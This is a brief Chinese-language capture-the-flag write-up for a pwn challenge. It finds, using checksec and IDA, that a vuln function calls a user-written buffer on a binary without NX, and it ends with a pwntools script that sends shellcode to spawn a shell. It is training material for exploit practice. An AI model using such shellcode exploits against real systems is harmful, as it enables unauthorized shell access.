1.checksec
2.ida
发现main函数不能编译,只能看汇编了,在main中还调用了vuln函数,然后我们查看一下可疑的vuln函数
然后我们就要知道参数a1是从哪传进来的,回到main函数vuln处
发现参数a1应是ebp+var_A0处的内容,也就是我们会在这个位置写入任意东西。
再往后看
发现它会直接call这个位置,而且该程序没有开NX,故我们可以直接发送shellcode,这样程序就会直接执行shellcode从而拿到shell
3.exp
from pwn import*
p=process('./30')#远程记得用remote()
context(os = 'linux',arch = 'i386',log_level = 'debug')
shellcode=asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()